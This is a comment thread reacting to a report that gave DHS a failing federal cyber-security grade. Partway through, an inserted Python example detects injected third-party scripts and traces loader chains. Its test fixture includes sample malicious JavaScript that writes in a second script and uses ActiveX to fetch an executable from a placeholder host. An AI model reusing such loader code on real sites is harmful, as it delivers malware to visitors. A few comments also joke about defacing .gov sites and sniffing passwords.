DHS Gets Another "F" In Cyber Security
An anonymous reader writes "For the third straight year, the Department of Homeland Security -- which is charged with charting the federal government's cyber security agenda -- earned a grade of "F" for computer security from a key congressional oversight committee, according to a story at Washingtonpost.com. Not only did the overall government-wide computer security grade remain flat (at a barely-passing "D+"), but several agencies -- mostly those on the "front lines in the war on terror" -- actually managed to fare worse this year."
There's lots of blowback at work here, and it's on purpose!
...they're too busy ensuring the security of US citizens to worry about minor details like ... the security of US citizens.
Considering that the findings are given back to the relevant departments to improve upon, going backwards requires not only that services are added but that their security efforts don't improve, or even get worse, with the new projects.
Perhaps the demands of IT in these departments have increased significantly to account for these services. Anyone know?
__
Funny Adult Videos @ Laugh DAILY
But, such a thing can't be possible, surely?
-jcr
The only title of honor that a tyrant can grant is "Enemy of the State."
With all the incompetence being displayed in my government's administration, I many times wonder whether I live in a developed country. Should the meaning of "developed country" be re-defined? Remember, nothing seems to get done right in these United States of America these days.
Well then, time to deface some .gov websites with drawings of the prophet Muhammed...
Cracking child porno is much more important than these trivial issues. Why care when everything is available at/from google.
They called me mad, and I called them mad, and damn them, they outvoted me. -Nathaniel Lee
At one office that I worked in, we made regular trips to the agency's excess equipment warehouse to scrounge for parts that we used to build "new" (newer) computers. That was the only way that we could obtain computing hardware. There was no money in the budget for PCs, even though we were a software development group. We provided our own hardware and software support, by necessity.
Mea navis aericumbens anguillis abundat
It figures. Institutions like the DHS are completely focused on administrative, paper-tiger security, which in the end doesn't result in real security for anyone, but instead a freedom-diminishing administrative load on everyone.
The National Science Foundation and the General Services Administration each saw their scores rise from a C-plus in 2004 to an A last year. The Environmental Protection Agency and the Department of Labor earned A-plus grades in 2005, up from B and B-minus respectively.
Good to see there are competent people out there, it should not be impossible. It's just sad that the more 'safety-critical' the organization is, the more sloppy they get on critical points in their organization.
molmod.com - computing tips from a molecular modeling
the "environmental protection agency", which uses linux, got a "grade A"!
The departments are just waiting to be comprehensively attacked by some knuckleheads, so that their military industry sponsors can make money on further upgrading the war machine.
Stop the brainwash
Perhaps they are purposely performing badly so they can get more funding?
http://www.livejournal.com/users/metricmusic
I suspect these people are accountable to nobody, least of all the people. So what's with the infantile school grading?
B minus? D minus? Who cares. It's not like these institutions are going to go home and blub because they got bad school grades. Another propaganda stunt to make you believe your incompetent and unaccountable institutions are actually answerable to anybody imho.
prayer based security?
Being bitter is drinking poison and hoping someone else will die
JOSHUA
If you believe in the principle that government should have more to fear from the people than the people have to fear from government then this is probably good news as it's difficult to fear incompetence.
..other than the consequences of Bush's actions in the Mideast. If the country was under a legitimate threat, then a lot of funding would go into many processes. Bush is simply artificially exacerbating the threat by stepping on an ant's nest. Why? They are far from stupid. This keeps them in power, and to the masses justifies their actions. Iraq was terrorist free, now it is creating 100s every day. It is this artificially created threat that is BUSH's masterplan,
money well spent! Go America!
"Freedom and Justice for All" is a registered trademark of The United States Govt Inc. Not available in all areas.
tsk tsk, mr DHS examiner.
don't you know that giving out grades to kids doesn't make
them ready for the reeealll world....
DHS got in trouble for using taxpayer money to buy lawnmowers and having lawnmower races. What a waste of our tax money. They're probably slack on fixing their computer security so that they can ask the president for more tax payer money and he'll probably say yes, and then they'll go spend some more money buying more lawnmowers for more lawnmower races. What kinda homeland security is this?
Criticizing DHS can be seen as being unpatriotic.
Free Software: Like love, it grows best when given away.
Maybe they outsourced their IT-department to India?
We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
You know, DHS has many sub-organizations within it. There are different groups responsible for IT Security within the different organizations and there is nothing that says "You will do this..." because there are different requirements for each location. When you say that there is no security, are you talking about a network that is intentionally exposed to facilitate ease of use for particular tasks or one that is harboring vital information? Are you knocking the techs for the network being vulnerable or the users for writing down passwords on post-it notes? A Congressional Oversight committee says that security is lacking? Half of them don't even know how to get into their own calendars, and get up in arms if they can't get to their AOL e-mail from the office. They have no idea what it takes to give them what they demand; all they care about is papers that say that it has to be locked down. How many of you techs work in an environment where you can't download drivers from an FTP site without approval and access to a specific machine that is locked down? A 2 min download takes a day to get signed off on. It may not be like this in all of DHS, but I can tell you that there are locations where someone needs to do a review to relax the existing level of security to allow people to do some work. This whole issue is B.S. in my eyes. The only way to make a passing grade based on government standards is to kick out all of the users and build a token ring that's not connected to the outside world.
Perhaps they spent all their IT resources wiretapping US citizens to worry about their own networks.
We had elected Al Gore. I hear he invented the internet. We'd be in much better shape then.
GETPKG - Package Management for Slackware
I wish I could say I'm surprised, but, honestly? Not so much. It just fits in with the overall record.
What I'd really like to know is how much money goes into system security. Most likely an amount that should turn their system into something that puts Fort Knox to shame.
If it were political incompetence that would put the blame on us.
In any organization (including a nation), there is a "rule of 2": someone must be twice removed from you to be a good scapegoat. Otherwise you're still associated with whatever the screwup was.
Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
What if the government put out a bid for someone to undertake cyber attacks against them as well as provide funding for the repair/protection of these systems?
Offer, say, $1M to an organization to start cyber attacks on a specified date. These agencies would know full well that such an attack was coming. Do *YOU* want to be the one to try and explain why *YOUR* system was able to be broken into? Just as there was a huge effort to counteract the Y2K "bug", and we survived it relatively unscathed, I'm thinking a scheduled attack would do wonders in getting things secured, ASAP.
We could have nearly impenetrable systems by year's end.
Who on a Congressional Oversight Committee is qualified to comment on someone else's computer security?
Seriously, WHO?! I want names and bios/resumes of specific individuals relative to how they're qualified to comment on anything in this area or field.
I agree with some of the comments about too much paperwork and too little actual work. Of course, it's Government Contractors (I B one) that are doing the work -- more paperwork == more money.
I work on some enterprise-level software (complete with login and secure information) for DHS. We had to get security clearance to work with their data. But then they decided that they wanted us to host it. Without SSL/encryption.
that is classified.. ;P
whilst Linux is undoubtedly good, I used it for my MCSE exams and got a "Grade F". Using Linux is not a guaranteed method of getting an "A".
I'm looking over the wall, and they're looking at me!
shouldn't that be: from the heckuva-job-team dept. ?
The IRS is the one organization that you don't want to fuck with. Remember, these are the guys who took down Al Capone.
This is to be expected. After all, when the feds are so busy watching us, how can we expect them to take care of themselves? Same goes for their network security. If they're so goddamn busy cracking into our E-mails and our home and corporate networks, they can't possibly be expected to secure their own, can they?
All of this, after they discover China's been operating a massive hacking campaign over here in the United States. You have to wonder if they're not just trying to screw up.
Would you mind telling us the hosting site's name? We'd like to install our password sniffers early. Or should we just monitor the FTP sites instead?
which is a fairly accurate portrait of organizational incompetence, or would be if the cardinals were a bit more apathetic.
I think, as a rule, governments can effectively only do one hard thing at a time. By "hard" I mean something that in an organizational sense is like computational "hardness": you can't really do a perfect job of it, and you can exhaust all your resources trying to. You can walk and chew gum at the same time because both things are routine and use well trained motor programs. But if I gave you a marionette, you could probably get it to walk or chew gum, but not both at the same time until by practice you managed to combine the two into a single action.
Governments can run a national park system and regulate food additives at the same time, because these are routine things like walking, well, walking and chewing gum. But organizing DHS at the time we did was, in my opinion, a bit of disastrous overconfidence.
DHS was established in January 2003, at the same time the administration was planning an invasion of Iraq in March. Homeland security is a "hard" problem. War and nation building -- in fact region building -- are also "hard" problems. The only way you can do this is to find some way to combine the two into a single priority. The administration has done this rhetorically -- e.g. the well known "mushroom cloud" threat -- but on a practical day to day basis these efforts are completely separate. DHS so far as I know doesn't have anything to say about what is happening in Iraq, and neither does the Iraq effort consider things like infrastructure security. The only point of contact between the two I can see is that they'd both like to have more of the Coast Guard's bandwidth.
Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
I know, let's name it the Central Intelligence Agency. Wait, we already have such an agency. We should disseminate the other operations that the CIA currently manages to appropriate agencies. Foreign clandestine operations go to the State Department...etc. Obviously we would have to maintain security standards across agencies. If the CIA has the mandate they can set standards. If we had one agency that mandated data storage, security and dissemination across government branches we may have been able to foil 9/11 with a simple data mining operation. As someone who supports a local Police Department, we would be more than willing to have some of the more difficult technical requirements for data storage mandated.
"I myself am made entirely of flaws, stitched together with good intentions."
So, a friend who will remain unnamed, and works for an unnamed contractor, called me one day a few months ago and asked me to scope out an (unnamed) Navy website. He said he saw something suspicious -- looking like a subtle defacement by a 3rd party. So, I went there and took a look and yes, in fact, there was a *tiny* javascript insertion in the page calling a javascript file from some random IP. I tracked it down -- several indirections later -- to a Chinese website which was causing the insertion of an ActiveX control. It was all very obfuscated and suspicious.
So, my friend contacts the webmaster of the Navy site and explains what he saw, how it was tracked down (he left my name out -- thank god -- since my name is very Islamic and happens to be shared with an at-large eastern European Islamic terrorist. Bad enough that it's a disaster whenever I *try* to fly. Thanks, dad.) and what did my friend get in return? Thanks? A "We'll look into that, good job, citizen"? No, he was accused of hacking the site, and they informed the Secret Service of him and his "actions".
Fortunately, the SS (lol) realized he'd done the right thing and was innocent.
But, seriously folks, how fucked up is this?
lorem ipsum, dolor sit amet
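The kind of check the poster above describes doing by hand, written out as an added example. This is not code from the original post or from any Navy site: it pulls every <script src> out of a page, flags the ones served from a bare IP or a host outside the site's own domain, then follows the loader-to-loader indirection until something instantiates an ActiveX/object control. The page, the hosts (203.0.113.0/24 and *.test are reserved for documentation) and the script bodies are constructed test data, and offline_fetch stands in for the HTTP fetches a real run would make.

```python
"""Find an injected third-party <script src> and trace the loader chain.
Added example; all hosts, IPs and script bodies below are constructed."""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"<>()]+")
ACTIVEX_RE = re.compile(r"ActiveXObject|<object\b|classid=", re.IGNORECASE)


class ScriptSrcParser(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def foreign_scripts(html, site_host):
    """Return (src, reason) for every script not served from site_host."""
    parser = ScriptSrcParser()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        host = urlparse(src).hostname
        if not host:
            continue  # relative path: same origin as the page itself
        if host == site_host or host.endswith("." + site_host):
            continue
        try:
            ipaddress.ip_address(host)
            reason = "script loaded from a bare IP address"
        except ValueError:
            reason = "script loaded from a third-party host"
        findings.append((src, reason))
    return findings


def follow_chain(start_url, fetch, max_hops=5):
    """Follow loader-to-loader indirection starting at start_url.

    fetch(url) returns the body as text, or None if it cannot be retrieved.
    Returns (hops, verdict): URLs visited in order and a one-line verdict.
    """
    hops, seen, pending = [], set(), [start_url]
    while pending and len(hops) < max_hops:
        url = pending.pop(0)
        if url in seen:
            continue
        seen.add(url)
        hops.append(url)
        body = fetch(url)
        if body is None:
            continue
        if ACTIVEX_RE.search(body):
            return hops, "ActiveX/object instantiation reached at " + url
        pending.extend(u for u in URL_RE.findall(body) if u not in seen)
    return hops, "no ActiveX payload within %d hops" % max_hops


# Constructed sample page: one legitimate relative script, one injected
# script pulled from a bare IP in the TEST-NET-3 documentation range.
SAMPLE_PAGE = """<html><head><title>Fleet Status</title>
<script src="/js/site.js"></script>
<script src="http://203.0.113.7/x.js"></script>
</head><body><h1>Fleet Status</h1></body></html>"""

# Constructed loader chain: the first hop document.write()s a second
# script, the second hop instantiates an ActiveX control.
SAMPLE_BODIES = {
    "http://203.0.113.7/x.js":
        "document.write('<scr'+'ipt src=\"http://cdn.example.test/b.js\"></scr'+'ipt>');",
    "http://cdn.example.test/b.js":
        "var o=new ActiveXObject('MSXML2.XMLHTTP');"
        "o.open('GET','http://cdn.example.test/p.exe',false);",
}


def offline_fetch(url):
    """Stand-in for an HTTP GET; serves only the constructed bodies above."""
    return SAMPLE_BODIES.get(url)


def triage(html, site_host, fetch):
    """Flag foreign scripts in html and trace each one; returns reports."""
    reports = []
    for src, reason in foreign_scripts(html, site_host):
        hops, verdict = follow_chain(src, fetch)
        reports.append({"src": src, "reason": reason, "hops": hops, "verdict": verdict})
    return reports


if __name__ == "__main__":
    for r in triage(SAMPLE_PAGE, "fleet.example.test", offline_fetch):
        print(r["src"], "-", r["reason"])
        for i, hop in enumerate(r["hops"]):
            print("  hop %d: %s" % (i, hop))
        print("  verdict:", r["verdict"])
```

Against a live site, fetch would be an HTTP client with a short timeout that never executes what it downloads; the hop limit keeps a redirect loop from running the tracer forever, and the allowlist is the site's own host plus its subdomains, so a CDN the site legitimately uses has to be added explicitly rather than silently trusted.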
all of you are talking out of your collective asses. The ones that got good grades were the smallest agencies! The tactics used to check security within all of the departments are quite intensive and always from the inside with access to almost anything they want! In larger departments that are spread all over the country it's very difficult to get an "A". my .0000000000001 cents worth
Your friend is a stupid fuck.
Didn't learn at an early age that you don't dare tell the emperor that he's naked or you'll get your head chopped off.
The House Government Reform committee does some investigation and gives an agency a poor grade.
The Secretary for the agency gets grilled by Congress-critters on why their agency is failing, again. The Secretary doesn't really care about IT security, but (s)he does care about not getting grilled by Congress-critters.
The secretary authorizes some obscene amount of dollars to go towards "improving IT security" and signs off on some plans that purport to do this. Often these are bundled together with initiatives for IT centralization, better management practices, the yearly re-org plan, etc. If you're lucky, some fair portion of the obscene dollar amount actually goes towards something that might really help IT security.
Various political appointees (Deputy Secretaries, Assistant Deputy Secretaries, Associate Deputy Assistant Secretaries, etc.) get shuffled around in the post-Congressional-snitfit era and engage in vicious political battles that make Imperial ascension politics in the Roman Empire look like a shuffleboard tournament. This of course immensely helps the prospects of improving IT security.
Meanwhile, various Beltway contractors propose all sorts of interesting things the agency can do with the money. The ones who are already working with the agency make recommendations to steer the dollars towards projects they can successfully bid on and ways they can increase their headcount, and the outsiders try to weasel their way in. Vendors make extravagant promises about their gear and generously distribute dinners, trips, tickets and job offers in desperate attempts to land a multi-million dollar sale.
Somebody (no one ever admits to this later) actually buys off on some subset of these promises and signs a PO to Make This Happen.
The money eventually filters down to the GS-15s and 14s (career employees) and contractors who Actually Do Something instead of going to meetings all day and answering email. They often emulate the successful political appointees above them by holding lots of meetings and sending lots of email. However, they get to Actually Do Something as well. Lucky them.
Some random collection of program managers, unwitting new subcontractor hires, and government support employees are thrown together to Make This Work. If they're lucky, enough of the people on the task have worked together before to know how to navigate through the bureaucratic, corporate and technical obstacles to have something to show for their efforts after 6 months. If not, well, the government paid for Yet Another Jobs Program.
3 times out of 10, the proposed solution fails so miserably that they can't even convince the other contractors and govvies to put it into production.
6 times out of 10, it works just well enough to shoehorn the "solution" into production, as long as the duct tape holds and they can hire enough bodies for the Mongolian Horde approach to IT ("quick, get more people for the overnight shift, the ticket count's escalating again!"). But that's okay, 'cause the same contractors and govvies will get to fix it again next year when the problem still isn't solved.
1 time out of 10, they actually Make It Work. Wow. People stumble around in shock, awe and amazement at what they have created. Users are happy, management is off their backs. But don't worry. Something will change in another 6 months to bring completely new requirements into the picture, and you get to roll the dice again.
"We can categorically state that we have not released man-eating badgers into the area." - Major Mike Shearer, UK
If the 9/11/2001 planebombs (including a direct hit on the Pentagon) and the ever-increasing terrorism rate since we invaded Iraq aren't enough for Bush to get even a passing grade in Homeland Security, he never will. Even the Katrina flood disaster, in which an entire American city was destroyed while Homeland Security's FEMA agency flailed, wasn't enough to get their asses in gear. Meanwhile, that vast catastrophic failure of DHS is used to justify spying on Americans. Including spying on completely peaceful pacifists, just because they peacefully oppose Bush's war policies.
We have never been weaker or more unsafe. Our union is divided everywhere, persecuted by our government, churning our experienced national security personnel (including our military) into a useless, expensive albatross around our neck. If someone actually attacked us, we'd be worse off than before we got all these "warnings", many of which are already killing thousands of Americans.
These clowns have got to go.
--
make install -not war
I know, it's so easy (and fun!) to slam the gov't when they mess up. Lately, they seem to be messing up an awful lot (which translates into an awful lot of fun for folks like me!).
Only a few agencies improved and those agencies aren't even as significantly correlated to security as the likes of DHS, etc.
It feels a lot like hypocrisy to me, when the gov't continuously appears to be able to fail and get away with it but we normal, everyday citizens cannot "officially" get away with much at all.
I wish there was some undiscovered land to be found because I feel the spirit of Christopher Columbus wanting to escape all this seemingly irreparable bureaucracy and start anew elsewhere.
Richard (aka Merwyck, aka QuaDZeRo) I blog at http://richardharlos.com
...I wanted to reiterate that this is ONLY based on Federal Information Security Management Act (FISMA) reporting. Essentially, FISMA reporting is a basic assessment of system vulnerabilities and policies/procedures. Additionally, reporting is inaccurate, as the system being evaluated must be in the DHS systems inventory -- most systems are not because DHS has a poor inventory. Therefore, most systems are not even evaluated.
So, if this "report card" were properly reported, more systems would be in the population (and sample, since I feel sample size is too low). And if better, more in-depth security assessments were done, DHS would probably do even worse. I just wanted to give you the warm fuzzies...
Anyhow, people the under the CISO (Bob West) are working to get a better inventory and to improve FISMA reporting, but the processes are painfully slow due to growing pains, political battles and the typical laziness that consumes government workers.
We should get some more guys from the casino and porn industries in here to whip system security into shape...seriously...
01100111 01100101 01110100 00100000 01101111 01110101 01110100 00100000 01101101 01101111 01110010 01100101 00101110
Why don't they just outsource it to another country, perhaps Arab?
...that DHS lacks security but gathers data....rather convenient for someone who breaks past the flimsy security and then gets the jackpot in US citizen data. Compiling data from previously private and secure places and then storing them in dangerously unprotected data centers is a treasure trove for any decent hacker. IMHO they should not have even begun "securing" America until their network was up to snuff; to do anything else is to undermine the security of your nation intentionally or stupidly, there isn't really much other option there.
sorry for harsh criticism of your country's security but it sounds like you're taking cash out of Fort Knox and then keeping it in a cookie jar in a daycare centre while telling people you're securing it further. i truly don't get it. are you trying to open your country for the world?
according to this story, which is a kind of "Greatest Hits" for DHS that will curl your toes.
(%i1) factor(777353);
(%o1) 777353
I don't know many GS-14's or -15's that actually do anything...and I've met a LOT.
The government needs to eliminate this bullshit job security and make people work for a living. If people don't work and meet performance standards, they should get fired.
But no, that's much too logical. Instead, we allow people to put in a good couple years when they're young (and want to work) and then support them through the rest of their life while they slack off and can't be fired. Most people need some sort of fear for their job or they won't work. It's as if every government worker past three years has won the lottery -- at least 50k/year for the rest of their life for doing nothing. Shit, I should stop contracting...
01100111 01100101 01110100 00100000 01101111 01110101 01110100 00100000 01101101 01101111 01110010 01100101 00101110
OpenBSD has announced it will sidestep the patent on praying by starting work on its own "OpenPrayer" firewall.
Everyone knows that the government's attempts to ensure some sort of national computer security are going to suck. It is almost a forgone conclusion.
Basically, everyone knows that government sucks... the only difference is that some people think the government sucking is pretty much inevitable, and want to avoid more government. Whereas other people believe that the only reason the government sucks is because we don't give them enough resources (in the U.S. we give over 50% of GDP to governments, so maybe we need to give the government 75% or 100% of GDP to do a good job).
I have no way of knowing if this is true or not. Even so, if someone does find such a thing, you report everything *ANONYMOUSLY*
And if they don't take action, you drop it on Bugtraq/send it to the media (again, anonymously--use a remailer if necessary). Even if they're too clueless to fix it, the media attention will get them moving.
I had entirely too much access to certain files at a state university once. In theory, I could have ended up expelled, etc. for that, which is ridiculous. Instead, I promptly reported the vulnerability I had found, stayed anonymous, and saw that they fixed it. I didn't get in any trouble because I didn't allow for that.
One wonders how they manage to keep failing at this. I mean, it's the DHS. You'd think they'd be on top of this kind of thing.
Then one wonders, what if they really are? I mean, it's the DHS. A tempting target for any terrorist hackers. What if they're really more secure than they've made themselves out to be? Could it be that the DHS network is just a giant honeypot?
You have to admit, it would be an interesting idea, and not exactly stupid. But then again, this government isn't on the ball as far as "not stupid" is concerned, are they?
Tluin natha Linux xxizzuss uriu olt bwael mon'tun.
Netcraft confirms it! BSD has risen from the dead! The Kingdom is at hand! The geeks shall inherit the earth!
It's not offtopic, dumbass. It's orthogonal.
When I was last in exams, for work not for trivial stuff like degrees, passing grade was C, like it had been all my life. Less than half marks, no pass. KISS.
Birds are not dinosaur descendants; birds are dinosaurs, for all useful meanings of "birds", "are" and "dinosaurs"
Sounds like the exact same issue large corporations have. They spend so much time documenting processes and engaging procedures around those processes, no one does the actual work. What's worse is the reason they do all this documentation is so that anyone, regardless of skill level, can perform the job. Anyone in IT knows it takes a great deal more than "reading the instructions" to implement almost anything related to a computer.
I'm definitely not surprised. Our government for years has set a bad example that most U.S. companies gladly emulate: poor practice, no implementation, legal protection, excessive documentation, falsifying accounting, overspending the budget, overpaying the executives, underpaying the workers and getting no real work done.
Imagine how admired our government would be if they worked like a small business: small group of executive voices say to do it; fairly paid, valued workers do it; it gets done; customers are happy; repeat business ensues.